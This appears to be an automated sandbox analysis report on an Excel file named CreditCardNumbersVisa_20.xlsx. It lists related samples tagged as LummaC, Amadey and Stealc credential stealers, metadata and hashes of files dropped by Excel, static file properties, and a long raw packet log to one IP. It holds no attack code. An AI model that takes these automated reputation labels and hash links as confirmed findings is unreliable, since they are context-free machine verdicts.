https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
  • 13.107.246.45
a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
  • 13.107.246.45
file.exeGet hashmaliciousLummaCBrowse
  • 13.107.246.45
file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
  • 13.107.246.45
file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
  • 13.107.246.45
file.exeGet hashmaliciousLummaCBrowse
  • 13.107.246.45
file.exeGet hashmaliciousLummaCBrowse
  • 13.107.246.45
file.exeGet hashmaliciousLummaCBrowse
  • 13.107.246.45
file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
  • 13.107.246.45
1Ebp0gOgh5.exeGet hashmaliciousLummaCBrowse
  • 13.107.246.45
file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
  • 13.107.246.45
No context
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):118
Entropy (8bit):3.5700810731231707
Encrypted:false
SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5:573220372DA4ED487441611079B623CD
SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious:false
Reputation:moderate, very likely benign file
Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
Category:dropped
Size (bytes):4770
Entropy (8bit):7.946747821604857
Encrypted:false
SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
SHA1:719C37C320F518AC168C86723724891950911CEA
SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
Malicious:false
Reputation:high, very likely benign file
Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):338
Entropy (8bit):3.253527266631171
Encrypted:false
SSDEEP:6:kKlhtsN+SkQlPlEGYRMY9z+s3Ql2DUevat:9TkPlE99SCQl2DUevat
MD5:58A5B8886EFA2ED4E0CFE52D7212152E
SHA1:FA7E29374EF30D078FB4E9B37E65B22A0899E1E3
SHA-256:87F43418177C854DAE9505517F4E012083F7DCDE700612E1CBA0747C007C0ED6
SHA-512:68A4C9FF6E88EA5879934AA060050B1CD7063B34CB54BA1365A2A08FECAE2D62D68C85F08ED5A3306D8998169F905EE5EA7F144139E2499DA8A96E43BC492B2E
Malicious:false
Reputation:low
Preview:p...... .........$L*w*..(....................................................... .........p.........$.....(=........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:Microsoft Excel 2007+
Category:dropped
Size (bytes):12913
Entropy (8bit):6.980918569117724
Encrypted:false
SSDEEP:192:kRgsVLWCQ9vYQIeVl8t2+rwM0MejLwsxQoaZw2VKe2pyZfzG5dGv3dp:ufWtlN8tvwXPjss+FVKeeyZOs/n
MD5:CEF758EFED744080CC67DA96F76CCAA7
SHA1:8CA30705AD017DB3A846AACDD68A000D42A5068B
SHA-256:AC244AAAFCCD7ECC39C60469BDF4EEA2A3078E0956766D66F81D0687780EA307
SHA-512:3EFBDFC81BE34A59322FB187B434EE1C3194B5BB1F4E7A5B0E045BEA40A0D064E1136FBB4A8C83EBE6F6A8EA82A83BEA6115F57678133551BF93490A1CE1333E
Malicious:false
Reputation:low
Preview:PK..........!.J.%............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0..W.?D.V.@.......[$...x ..my....YTU,.@j/..{.2......L...8..N.....icg......E...V....5...ooz..L..b&.".$%..T.S.....J.?...*....n.. sg.,.......L...u.7J&..y.....4.".*.V."i....]...:E.@i,..*S..3....1.. g....n].\..aa<..#...qW...G0......*..W..ra>qn...i...R..t....Q.[..Bj......?.q.G:....x.|$......%.?..z..P...4...'.)..1..<r..h.]d..-.@...>4...=#G..m.:c5.....U..o`....C.........PK..........!..^.e............_rels/.rels .
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:false
Reputation:high, very likely benign file
Preview:[ZoneTransfer]....ZoneId=0
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:Microsoft Excel 2007+
Category:dropped
Size (bytes):12913
Entropy (8bit):6.980918569117724
Encrypted:false
SSDEEP:192:kRgsVLWCQ9vYQIeVl8t2+rwM0MejLwsxQoaZw2VKe2pyZfzG5dGv3dp:ufWtlN8tvwXPjss+FVKeeyZOs/n
MD5:CEF758EFED744080CC67DA96F76CCAA7
SHA1:8CA30705AD017DB3A846AACDD68A000D42A5068B
SHA-256:AC244AAAFCCD7ECC39C60469BDF4EEA2A3078E0956766D66F81D0687780EA307
SHA-512:3EFBDFC81BE34A59322FB187B434EE1C3194B5BB1F4E7A5B0E045BEA40A0D064E1136FBB4A8C83EBE6F6A8EA82A83BEA6115F57678133551BF93490A1CE1333E
Malicious:false
Preview:PK..........!.J.%............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0..W.?D.V.@.......[$...x ..my....YTU,.@j/..{.2......L...8..N.....icg......E...V....5...ooz..L..b&.".$%..T.S.....J.?...*....n.. sg.,.......L...u.7J&..y.....4.".*.V."i....]...:E.@i,..*S..3....1.. g....n].\..aa<..#...qW...G0......*..W..ra>qn...i...R..t....Q.[..Bj......?.q.G:....x.|$......%.?..z..P...4...'.)..1..<r..h.]d..-.@...>4...=#G..m.:c5.....U..o`....C.........PK..........!..^.e............_rels/.rels .
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):165
Entropy (8bit):1.5231029153786204
Encrypted:false
SSDEEP:3:sYp5lFltt:sYp5Nv
MD5:B77267835A6BEAC785C351BDE8E1A61C
SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
Malicious:false
Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
File type:Microsoft Excel 2007+
Entropy (8bit):6.979482652194069
TrID:
  • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
  • ZIP compressed archive (8000/1) 18.60%
File name:CreditCardNumbersVisa_20.xlsx
File size:12'899 bytes
MD5:4a78e0e0db778f79f5a76a16c447c6c4
SHA1:5916f25319eaf7e13bd7a311abc6af39cb456819
SHA256:d1d5930da65d1436f99f7e518892c2ebc1d8d1cf2976fa0863522df7cc33dcfd
SHA512:567455dcbc314b7b1a952b1a7a6815d570a133363dc4df8a987f965c13b9b97a46abc1e6572d5799df73a8c99638652303dd8b097a14d5ce43ee03e49ede3010
SSDEEP:192:kRgsKbvzx89v8YVMeqWQ+ni5xcM96MejLwsxQoaZw2VKF/yZfzG5dGvKtNX:ucb7Ol500qcZPjss+FVKF/yZOsitp
TLSH:E4428D1DD9519A3AC37798BEE10C00F5369E2082525DD24F34C9BF6D2A8279F078F2A9
File Content Preview:PK..........!.J.%.............[Content_Types].xml ...(.........................................................................................................................................................................................................
Icon Hash:35e58a8c0c8a85b9
Document Type:OpenXML
Number of OLE Files:1
Has Summary Info:
Application Name:
Encrypted Document:False
Contains Word Document Stream:False
Contains Workbook/Book Stream:True
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:False
Flash Objects Count:0
Contains VBA Macros:False
TimestampSource PortDest PortSource IPDest IP
Oct 30, 2024 03:55:37.030726910 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:37.030821085 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:37.030981064 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:37.031276941 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:37.031330109 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:37.765032053 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:37.765209913 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:37.767402887 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:37.767438889 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:37.767658949 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:37.775130987 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:37.819331884 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.002382994 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.002412081 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.002425909 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.002494097 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.002528906 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.002630949 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.021081924 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.021097898 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.021188021 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.021224022 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.021272898 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.136190891 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.136208057 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.136279106 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.136308908 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.137105942 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.137768984 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.137783051 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.137834072 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.137849092 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.137876034 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.138214111 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.139904976 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.139920950 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.139986992 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.140002012 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.140060902 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.236361980 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.236378908 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.236459017 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.236485004 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.236624956 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.253345966 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.253361940 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.253448009 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.253463984 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.253591061 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.254477024 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.254492998 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.254556894 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.254573107 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.254600048 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.254620075 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.255870104 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.255887985 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.255953074 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.255965948 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.255990028 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.256077051 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.257204056 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.257234097 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.257282972 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.257296085 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.257319927 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.257407904 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.258523941 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.258539915 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.258601904 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.258615017 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.258713007 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.259751081 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.259768009 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.259831905 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.259845972 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.260039091 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.300406933 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.300424099 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.300540924 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.300559998 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.300693035 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.353598118 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.353666067 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.353712082 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.353754997 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.353899956 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.353929996 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.353945971 CET49722443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.353954077 CET4434972213.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.418446064 CET52504443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.418488979 CET4435250413.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.418600082 CET52504443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.419991970 CET52505443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.420023918 CET4435250513.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.420259953 CET52506443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.420285940 CET4435250613.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.420304060 CET52505443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.420351028 CET52506443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.420584917 CET52507443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.420593977 CET4435250713.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.420790911 CET52504443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.420814037 CET4435250413.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.420846939 CET52507443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.420903921 CET52507443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.420914888 CET4435250713.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.420964956 CET52505443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.420978069 CET4435250513.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.421026945 CET52506443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.421039104 CET4435250613.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.422112942 CET52508443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.422142982 CET4435250813.107.246.45192.168.2.5
Oct 30, 2024 03:55:38.422214031 CET52508443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.422375917 CET52508443192.168.2.513.107.246.45
Oct 30, 2024 03:55:38.422391891 CET4435250813.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.141011000 CET4435250413.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.141844988 CET52504443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.141882896 CET4435250413.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.142309904 CET52504443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.142318010 CET4435250413.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.158941984 CET4435250513.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.161003113 CET52505443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.161031961 CET4435250513.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.161387920 CET52505443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.161393881 CET4435250513.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.163166046 CET4435250613.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.164769888 CET52506443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.164778948 CET4435250613.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.165100098 CET52506443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.165103912 CET4435250613.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.170034885 CET4435250713.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.170434952 CET4435250813.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.170707941 CET52507443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.170717001 CET4435250713.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.171099901 CET52507443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.171104908 CET4435250713.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.171413898 CET52508443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.171443939 CET4435250813.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.171850920 CET52508443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.171855927 CET4435250813.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.268744946 CET4435250413.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.268783092 CET4435250413.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.268821955 CET4435250413.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.268966913 CET52504443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.269226074 CET52504443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.269242048 CET4435250413.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.269282103 CET52504443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.269287109 CET4435250413.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.272382021 CET52509443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.272466898 CET4435250913.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.272572994 CET52509443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.272715092 CET52509443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.272747040 CET4435250913.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.287282944 CET4435250513.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.287437916 CET4435250513.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.287524939 CET52505443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.287641048 CET52505443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.287655115 CET4435250513.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.287664890 CET52505443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.287669897 CET4435250513.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.289932013 CET52510443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.289963007 CET4435251013.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.290038109 CET52510443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.290193081 CET52510443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.290206909 CET4435251013.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.295453072 CET4435250613.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.295474052 CET4435250613.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.295532942 CET52506443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.295542955 CET4435250613.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.295584917 CET52506443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.295653105 CET4435250613.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.295685053 CET4435250613.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.295738935 CET52506443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.295751095 CET4435250613.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.295770884 CET52506443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.295775890 CET4435250613.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.298934937 CET52511443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.298969030 CET4435251113.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.299077988 CET52511443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.299222946 CET52511443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.299242020 CET4435251113.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.301105022 CET4435250813.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.301336050 CET4435250813.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.301618099 CET52508443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.301647902 CET52508443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.301652908 CET4435250813.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.301675081 CET52508443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.301680088 CET4435250813.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.302889109 CET4435250713.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.302942038 CET4435250713.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.303117990 CET4435250713.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.303181887 CET52507443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.303258896 CET52507443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.303262949 CET4435250713.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.303272009 CET52507443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.303276062 CET4435250713.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.304815054 CET52512443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.304897070 CET4435251213.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.304987907 CET52512443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.305111885 CET52512443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.305147886 CET4435251213.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.306822062 CET52513443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.306844950 CET4435251313.107.246.45192.168.2.5
Oct 30, 2024 03:55:39.306915998 CET52513443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.307116985 CET52513443192.168.2.513.107.246.45
Oct 30, 2024 03:55:39.307123899 CET4435251313.107.246.45192.168.2.5
Oct 30, 2024 03:55:40.012830019 CET4435250913.107.246.45192.168.2.5
Oct 30, 2024 03:55:40.013634920 CET52509443192.168.2.513.107.246.45
Oct 30, 2024 03:55:40.013684988 CET4435250913.107.246.45192.168.2.5
Oct 30, 2024 03:55:40.014259100 CET52509443192.168.2.513.107.246.45
Oct 30, 2024 03:55:40.014272928 CET4435250913.107.246.45192.168.2.5
Oct 30, 2024 03:55:40.025909901 CET4435251013.107.246.45192.168.2.5
Oct 30, 2024 03:55:40.026295900 CET52510443192.168.2.513.107.246.45
Oct 30, 2024 03:55:40.026318073 CET4435251013.107.246.45192.168.2.5
Oct 30, 2024 03:55:40.026892900 CET52510443192.168.2.513.107.246.45
Oct 30, 2024 03:55:40.026896954 CET4435251013.107.246.45192.168.2.5
Oct 30, 2024 03:55:40.040688038 CET4435251313.107.246.45192.168.2.5
Oct 30, 2024 03:55:40.041098118 CET52513443192.168.2.513.107.246.45
Oct 30, 2024 03:55:40.041109085 CET4435251313.107.246.45192.168.2.5
Oct 30, 2024 03:55:40.041702986 CET52513443192.168.2.513.107.246.45
Oct 30, 2024 03:55:40.041707993 CET4435251313.107.246.45192.168.2.5
Oct 30, 2024 03:55:40.045294046 CET4435251213.107.246.45192.168.2.5
Oct 30, 2024 03:55:40.045794964 CET52512443192.168.2.513.107.246.45
Oct 30, 2024 03:55:40.045835972 CET4435251213.107.246.45192.168.2.5
Oct 30, 2024 03:55:40.046205997 CET52512443192.168.2.513.107.246.45
Oct 30, 2024 03:55:40.046219110 CET4435251213.107.246.45192.168.2.5
